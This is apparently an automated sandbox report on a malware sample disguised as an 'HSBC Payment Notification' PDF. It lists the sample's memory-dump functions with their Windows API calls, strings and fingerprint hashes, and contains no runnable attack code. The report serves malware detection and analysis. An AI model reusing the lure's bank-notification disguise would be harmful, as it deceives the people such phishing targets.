Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95

Function 004563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
TranslateMessage.USER32(?), ref: 0045645C
DispatchMessageW.USER32(?), ref: 00456466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D

Function 00458A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00458A30
PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94

Function 00464A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00464ABA
__beginthreadex.LIBCMT ref: 00464AD8
MessageBoxW.USER32(?,?,?,?), ref: 00464AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9

Function 009D0E6F Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000008,?,?,009D0B68,009D324B,?,009D12BA,?,?,00000000), ref: 009D0E74
_free.LIBCMT ref: 009D0EA9
_free.LIBCMT ref: 009D0ED0
SetLastError.KERNEL32(00000000,?,009D12BA,?,?,00000000), ref: 009D0EDD
SetLastError.KERNEL32(00000000,?,009D12BA,?,?,00000000), ref: 009D0EE6

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: a90ca917ff1526d5e2b0a8a6e94b8457c47a0c24028069eccb62049b7a689655
Instruction ID: c67b2ce281922653d8aa0ad9ce6758b960e806ee3e99cc02f1c522651ab1160b
Opcode Fuzzy Hash: a90ca917ff1526d5e2b0a8a6e94b8457c47a0c24028069eccb62049b7a689655
Instruction Fuzzy Hash: A601F4371C56017BD7127B74AC89B2F276DDBC1374F25892BF905E23A1EA748C015170

Function 00458202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64

Function 0045810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64

Function 0045C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
MessageBeep.USER32(00000000), ref: 0045C226
KillTimer.USER32(?,0000040A), ref: 0045C242
EndDialog.USER32(?,00000001), ref: 0045C25C

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59

Function 009D2701 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009D2719

Part of subcall function 009D1626: HeapFree.KERNEL32(00000000,00000000,?,009D2798,?,00000000,?,00000000,?,009D27BF,?,00000007,?,?,009D1C27,?), ref: 009D163C
Part of subcall function 009D1626: GetLastError.KERNEL32(?,?,009D2798,?,00000000,?,00000000,?,009D27BF,?,00000007,?,?,009D1C27,?,?), ref: 009D164E

_free.LIBCMT ref: 009D272B
_free.LIBCMT ref: 009D273D
_free.LIBCMT ref: 009D274F
_free.LIBCMT ref: 009D2761

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 465762b13b0b6e3998694e91d6a7b063dfefb79cbfe3c561067928f3fa026fe0
Instruction ID: 2535f452fe6c8c5c4dfd5acfa37a4ef1e456922648532d34a8f60c2059da3a33
Opcode Fuzzy Hash: 465762b13b0b6e3998694e91d6a7b063dfefb79cbfe3c561067928f3fa026fe0
Instruction Fuzzy Hash: 40F0FF33554240AB8730EB58E9C5D1A73EDEA94750BA89817F548DB751DA20FC8087A4

Function 00412CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB

__swprintf.LIBCMT ref: 00412ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 4f3edc8c56bf39c30857d576500cd0c87af0552594f6f6b8e0efc7254c5b9edb
Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
Opcode Fuzzy Hash: 4f3edc8c56bf39c30857d576500cd0c87af0552594f6f6b8e0efc7254c5b9edb
Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A

Function 00448584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044862B
_memmove.LIBCMT ref: 00448685

Strings

3cA, xrefs: 0044860C
_A, xrefs: 004486FF, 0044DFDC, 0044DFF8

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _memmove
String ID: 3cA$_A
API String ID: 4104443479-3480954128
Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55

Function 00486CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70

Strings

Listbox, xrefs: 00486D08

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4

Function 00426B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00426B93
__calloc_crt.LIBCMT ref: 00426BAC

Strings

K, xrefs: 00426BD1
@BL, xrefs: 00426BC3

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: __calloc_crt
String ID: K$@BL
API String ID: 3494438863-2209178351
Opcode ID: 1dcb651b5103459d55ad6e63b5153fbe911c496dbbbddd92234eb52377e23d61
Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
Opcode Fuzzy Hash: 1dcb651b5103459d55ad6e63b5153fbe911c496dbbbddd92234eb52377e23d61
Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C

Function 00404C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00404C1D
kernel32.dll, xrefs: 00404C0C

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728

Function 00404C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00404C50
kernel32.dll, xrefs: 00404C3F

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728

Function 00480DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07

Strings

advapi32.dll, xrefs: 00480DF0
RegDeleteKeyExW, xrefs: 00480E01

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28

Function 009955F0 Relevance: 6.4, APIs: 4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc4803f106e9e9f1e39ae320a97232a714183af438f858769fb4390bcf84b6f4
Instruction ID: bb35c2120101757d20ca7c235516375b955a59cd6bc6bf485f608b240be41b24
Opcode Fuzzy Hash: dc4803f106e9e9f1e39ae320a97232a714183af438f858769fb4390bcf84b6f4
Instruction Fuzzy Hash: 30D1562494EB819FDE3B476C4C19F7B2B9C6B72724F8F0592E4958A0F2E2284D47D352

Function 0047E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0047E0BE
